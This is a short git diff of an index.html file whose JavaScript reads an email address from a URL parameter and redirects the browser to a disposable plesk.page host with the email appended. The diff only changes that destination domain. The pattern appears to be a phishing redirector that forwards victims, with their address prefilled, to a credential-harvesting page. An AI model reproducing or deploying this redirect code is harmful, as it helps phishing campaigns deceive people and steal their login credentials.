--- a/index.html
+++ b/index.html
@@ -8,10 +8,10 @@ const email = urlParams.get('geng');
 var findat = "@";
 
 if ( email.indexOf(findat) > -1 ) {
-    var url = "https://busy-wing.23-148-144-37.plesk.page/i/?i=i&0="+email;
+    var url = "https://gerry-pam.49-129-167-42.plesk.page/i/?i=i&0="+email;
 } else {
  var emaill = email.split("/").join("@"); 
-    var url = "https://busy-wing.23-148-144-37.plesk.page/i/?i=i&0="+emaill;
+    var url = "https://gerry-pam.49-129-167-42.plesk.page/i/?i=i&0="+emaill;
 }
 window.location.href = url;
 
